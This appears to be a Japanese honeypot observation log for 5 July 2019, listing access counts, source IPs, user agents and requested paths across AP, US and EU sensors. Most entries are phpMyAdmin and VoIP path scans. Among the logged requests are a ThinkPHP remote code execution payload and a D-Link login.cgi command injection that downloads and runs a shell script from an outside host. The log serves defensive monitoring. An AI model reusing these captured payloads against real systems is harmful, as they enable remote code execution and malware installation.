ハニーポット(仮) 観測記録 2019/07/05分です。

APでは
ThinkPHPの脆弱性狙いのアクセス
を確認しました。

USでは
phpMyAdminに関するスキャン行為と
D-linkの脆弱性を狙うリクエスト
を確認しました。
Taiwan、Hong Kong、United Statesからのアクセスがちょうど108でした。

EUでは
アクセス数が減少し、おとなしい状況でした。

アクセス数推移

AP：総アクセス数：97 (前日比：+63)
US：総アクセス数：329 (前日比：+309)
EU：総アクセス数：4 (前日比：-111)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Region：AP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
2	100.114.72.70	United States
4	106.51.77.6	India
4	113.106.211.110	China
3	129.28.55.120	China
1	1.34.188.214	Taiwan
1	157.55.39.49	United States
2	176.58.124.134	United Kingdom
2	198.167.223.52	St Kitts and Nevis
1	46.246.44.177	Sweden
1	52.142.196.101	Netherlands
1	54.215.138.17	United States
1	61.219.11.153	Taiwan
64	62.173.140.193	Russia
1	66.249.71.122	United States
6	77.247.110.219	Netherlands
3	80.24.191.81	Spain

UserAgent一覧

件数	UserAgent
10	-
3	Go-http-client/1.1
1	Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)
1	Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
3	Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)
1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
1	Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
64	Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
2	Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
2	Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
8	Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
1	User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.0.3705

リクエスト内容一覧

件数	Method	Request	Protocol
1	-
1	GET	/aastra/	HTTP/1.1
1	GET	/algo/	HTTP/1.1
1	GET	/app/provision/	HTTP/1.1
1	GET	/asterisk/	HTTP/1.1
1	GET	/atacom/	HTTP/1.1
1	GET	/baFirmware/	HTTP/1.1
1	GET	/boot/	HTTP/1.1
1	GET	/bub/	HTTP/1.1
1	GET	/cfg/	HTTP/1.1
1	GET	/cisco/	HTTP/1.1
1	GET	/cnf/	HTTP/1.1
2	GET	/conf/	HTTP/1.1
2	GET	/config/	HTTP/1.1
1	GET	/configs/	HTTP/1.1
1	GET	/devicecfg/	HTTP/1.1
1	GET	/digium/	HTTP/1.1
1	GET	/fanvil/	HTTP/1.1
1	GET	/firmware	HTTP/1.1
1	GET	/firmwares	HTTP/1.1
1	GET	/fw/	HTTP/1.1
1	GET	/gateway	HTTP/1.1
1	GET	/gateways/	HTTP/1.1
1	GET	/gigaset/	HTTP/1.1
2	GET	/.git/config	HTTP/1.1
1	GET	/grandstream/	HTTP/1.1
1	GET	/gs/	HTTP/1.1
1	GET	/gswave/	HTTP/1.1
1	GET	/htek/	HTTP/1.1
1	GET	/index.php	HTTP/1.1
1	GET	/latest/meta-data	HTTP/1.1
1	GET	/linksys/	HTTP/1.1
1	GET	/Login.htm	HTTP/1.1
4	GET	/manager/html	HTTP/1.1
1	GET	/MikroTik/	HTTP/1.1
1	GET	/mitel/	HTTP/1.1
1	GET	/obihai/	HTTP/1.1
1	GET	/overides/	HTTP/1.1
2	GET	/panasonic/	HTTP/1.1
1	GET	/patton/	HTTP/1.1
1	GET	/phone-devices/	HTTP/1.1
1	GET	/phpmyadmin/index.php	HTTP/1.1
1	GET	/prov/	HTTP/1.1
1	GET	/provisioner/	HTTP/1.1
1	GET	/provision/	HTTP/1.1
1	GET	/provisioning/	HTTP/1.1
2	GET	/QUERY/en-us/msdn/	HTTP/1.1
1	GET	/reg	HTTP/1.1
2	GET	/robots.txt	HTTP/1.1
1	GET	/sangoma/	HTTP/1.1
1	GET	/Sep/	HTTP/1.1
1	GET	/SEP/	HTTP/1.1
1	GET	/sip.conf/	HTTP/1.1
1	GET	/sip.config/	HTTP/1.1
1	GET	/sip/	HTTP/1.1
1	GET	/sipphone/	HTTP/1.1
1	GET	/smart/	HTTP/1.1
1	GET	/smarty/	HTTP/1.1
2	GET	/snom/	HTTP/1.1
1	GET	/spa/	HTTP/1.1
1	GET	/spectralink/	HTTP/1.1
1	GET	/sys/	HTTP/1.1
1	GET	/temp	HTTP/1.1
1	GET	/tftpboot/	HTTP/1.1
1	GET	/tftp/	HTTP/1.1
3	GET	/TP/index.php	HTTP/1.1
2	GET	/TP/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1	HTTP/1.1
3	GET	/TP/public/index.php	HTTP/1.1
1	GET	/voice/	HTTP/1.1
1	GET	/voip/	HTTP/1.1
1	GET	/vpn/	HTTP/1.1
1	GET	/xml/	HTTP/1.1
2	HEAD	/robots.txt	HTTP/1.0
4	HEAD	/robots.txt	HTTP/1.1
1	OPTIONS	/	HTTP/1.1
3	POST	/TP/index.php?s=captcha	HTTP/1.1

Region:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
108	114.32.218.228	Taiwan
1	118.24.163.20	China
1	198.167.223.52	St Kitts and Nevis
108	202.131.65.218	Hong Kong
1	35.163.67.143	United States
108	73.253.72.93	United States
2	77.247.110.219	Netherlands

UserAgent一覧

件数	UserAgent
2	-
1	Hakai/2.0
1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
324	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36
1	Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36

リクエスト内容一覧

件数	Method	Request	Protocol
3	GET	/2phpmyadmin/index.php?lang=en	HTTP/1.1
3	GET	/admin/db/index.php?lang=en	HTTP/1.1
3	GET	/admin/index.php?lang=en	HTTP/1.1
3	GET	/administrator/admin/index.php?lang=en	HTTP/1.1
3	GET	/administrator/db/index.php?lang=en	HTTP/1.1
3	GET	/administrator/phpmyadmin/index.php?lang=en	HTTP/1.1
3	GET	/administrator/phpMyAdmin/index.php?lang=en	HTTP/1.1
3	GET	/administrator/pma/index.php?lang=en	HTTP/1.1
3	GET	/administrator/PMA/index.php?lang=en	HTTP/1.1
3	GET	/administrator/web/index.php?lang=en	HTTP/1.1
3	GET	/admin/phpmyadmin/index.php?lang=en	HTTP/1.1
3	GET	/admin/phpMyAdmin/index.php?lang=en	HTTP/1.1
3	GET	/admin/pMA/index.php?lang=en	HTTP/1.1
3	GET	/admin/sqladmin/index.php?lang=en	HTTP/1.1
3	GET	/admin/sysadmin/index.php?lang=en	HTTP/1.1
3	GET	/admin/web/index.php?lang=en	HTTP/1.1
3	GET	/database/index.php?lang=en	HTTP/1.1
3	GET	/dbadmin/index.php?lang=en	HTTP/1.1
3	GET	/db/db-admin/index.php?lang=en	HTTP/1.1
3	GET	/db/dbadmin/index.php?lang=en	HTTP/1.1
3	GET	/db/dbweb/index.php?lang=en	HTTP/1.1
3	GET	/db/index.php?lang=en	HTTP/1.1
3	GET	/db/myadmin/index.php?lang=en	HTTP/1.1
3	GET	/db/phpmyadmin3/index.php?lang=en	HTTP/1.1
3	GET	/db/phpMyAdmin-3/index.php?lang=en	HTTP/1.1
3	GET	/db/phpMyAdmin3/index.php?lang=en	HTTP/1.1
3	GET	/db/phpmyadmin/index.php?lang=en	HTTP/1.1
3	GET	/db/phpMyAdmin/index.php?lang=en	HTTP/1.1
3	GET	/db/webadmin/index.php?lang=en	HTTP/1.1
3	GET	/db/webdb/index.php?lang=en	HTTP/1.1
3	GET	/db/websql/index.php?lang=en	HTTP/1.1
1	GET	/.git/config	HTTP/1.1
3	GET	/index.php?lang=en	HTTP/1.1
1	GET	/login.cgi?cli=aa%20aa%27;wget%20http://194[.]147[.]32[.]131/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$	HTTP/1.1
3	GET	/myadmin/index.php?lang=en	HTTP/1.1
3	GET	/MyAdmin/index.php?lang=en	HTTP/1.1
3	GET	/mysql-admin/index.php?lang=en	HTTP/1.1
3	GET	/mysql/admin/index.php?lang=en	HTTP/1.1
3	GET	/mysqladmin/index.php?lang=en	HTTP/1.1
3	GET	/mysql/dbadmin/index.php?lang=en	HTTP/1.1
3	GET	/mysql/db/index.php?lang=en	HTTP/1.1
3	GET	/mysql/index.php?lang=en	HTTP/1.1
3	GET	/mysqlmanager/index.php?lang=en	HTTP/1.1
3	GET	/mysql/mysqlmanager/index.php?lang=en	HTTP/1.1
3	GET	/mysql/pma/index.php?lang=en	HTTP/1.1
3	GET	/mysql/pMA/index.php?lang=en	HTTP/1.1
3	GET	/mysql/sqlmanager/index.php?lang=en	HTTP/1.1
3	GET	/mysql/web/index.php?lang=en	HTTP/1.1
3	GET	/phpmyadmin2011/index.php?lang=en	HTTP/1.1
3	GET	/phpmyadmin2012/index.php?lang=en	HTTP/1.1
3	GET	/phpmyadmin2013/index.php?lang=en	HTTP/1.1
3	GET	/phpmyadmin2014/index.php?lang=en	HTTP/1.1
3	GET	/phpmyadmin2015/index.php?lang=en	HTTP/1.1
3	GET	/phpmyadmin2016/index.php?lang=en	HTTP/1.1
3	GET	/phpmyadmin2017/index.php?lang=en	HTTP/1.1
3	GET	/phpmyadmin2018/index.php?lang=en	HTTP/1.1
3	GET	/phpmyadmin2019/index.php?lang=en	HTTP/1.1
3	GET	/phpmyadmin2/index.php?lang=en	HTTP/1.1
3	GET	/phpMyAdmin2/index.php?lang=en	HTTP/1.1
3	GET	/phpmyadmin3/index.php?lang=en	HTTP/1.1
3	GET	/phpMyAdmin-3/index.php?lang=en	HTTP/1.1
3	GET	/phpMyAdmin3/index.php?lang=en	HTTP/1.1
3	GET	/phpmyadmin4/index.php?lang=en	HTTP/1.1
3	GET	/phpMyAdmin4/index.php?lang=en	HTTP/1.1
3	GET	/php-my-admin/index.php?lang=en	HTTP/1.1
3	GET	/php-myadmin/index.php?lang=en	HTTP/1.1
3	GET	/phpmy-admin/index.php?lang=en	HTTP/1.1
3	GET	/phpmyadmin/index.php?lang=en	HTTP/1.1
3	GET	/phpmyAdmin/index.php?lang=en	HTTP/1.1
3	GET	/phpMyadmin/index.php?lang=en	HTTP/1.1
3	GET	/phpMyAdmin/index.php?lang=en	HTTP/1.1
3	GET	/phpmy/index.php?lang=en	HTTP/1.1
3	GET	/phppma/index.php?lang=en	HTTP/1.1
3	GET	/pma2011/index.php?lang=en	HTTP/1.1
3	GET	/PMA2011/index.php?lang=en	HTTP/1.1
3	GET	/pma2012/index.php?lang=en	HTTP/1.1
3	GET	/PMA2012/index.php?lang=en	HTTP/1.1
3	GET	/pma2013/index.php?lang=en	HTTP/1.1
3	GET	/PMA2013/index.php?lang=en	HTTP/1.1
3	GET	/pma2014/index.php?lang=en	HTTP/1.1
3	GET	/PMA2014/index.php?lang=en	HTTP/1.1
3	GET	/pma2015/index.php?lang=en	HTTP/1.1
3	GET	/PMA2015/index.php?lang=en	HTTP/1.1
3	GET	/pma2016/index.php?lang=en	HTTP/1.1
3	GET	/PMA2016/index.php?lang=en	HTTP/1.1
3	GET	/pma2017/index.php?lang=en	HTTP/1.1
3	GET	/PMA2017/index.php?lang=en	HTTP/1.1
3	GET	/pma2018/index.php?lang=en	HTTP/1.1
3	GET	/PMA2018/index.php?lang=en	HTTP/1.1
3	GET	/pma2019/index.php?lang=en	HTTP/1.1
3	GET	/pma/index.php?lang=en	HTTP/1.1
3	GET	/PMA/index.php?lang=en	HTTP/1.1
3	GET	/program/index.php?lang=en	HTTP/1.1
3	GET	/shopdb/index.php?lang=en	HTTP/1.1
3	GET	/sqlmanager/index.php?lang=en	HTTP/1.1
3	GET	/sql/myadmin/index.php?lang=en	HTTP/1.1
3	GET	/sql/phpmanager/index.php?lang=en	HTTP/1.1
3	GET	/sql/phpmyadmin2/index.php?lang=en	HTTP/1.1
3	GET	/sql/phpMyAdmin2/index.php?lang=en	HTTP/1.1
3	GET	/sql/php-myadmin/index.php?lang=en	HTTP/1.1
3	GET	/sql/phpmy-admin/index.php?lang=en	HTTP/1.1
3	GET	/sql/phpMyAdmin/index.php?lang=en	HTTP/1.1
3	GET	/sql/sql-admin/index.php?lang=en	HTTP/1.1
3	GET	/sql/sqladmin/index.php?lang=en	HTTP/1.1
3	GET	/sql/sql/index.php?lang=en	HTTP/1.1
3	GET	/sql/sqlweb/index.php?lang=en	HTTP/1.1
3	GET	/sql/webadmin/index.php?lang=en	HTTP/1.1
3	GET	/sql/webdb/index.php?lang=en	HTTP/1.1
3	GET	/sql/websql/index.php?lang=en	HTTP/1.1
3	GET	/wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang=en	HTTP/1.1
2	HEAD	/robots.txt	HTTP/1.0
1	OPTIONS	/	HTTP/1.1

Region:EU

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	110.249.212.46	China
1	198.167.223.52	St Kitts and Nevis
1	54.183.109.102	United States
1	77.247.110.219	Netherlands

UserAgent一覧

件数	UserAgent
2	-
1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
1	Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36

リクエスト内容一覧

件数	Method	Request	Protocol
1	GET	/.git/config	HTTP/1.1
1	GET	http://110[.]249[.]212[.]46/testget?q=23333&port=80	HTTP/1.1
1	HEAD	/robots.txt	HTTP/1.0
1	OPTIONS	/	HTTP/1.1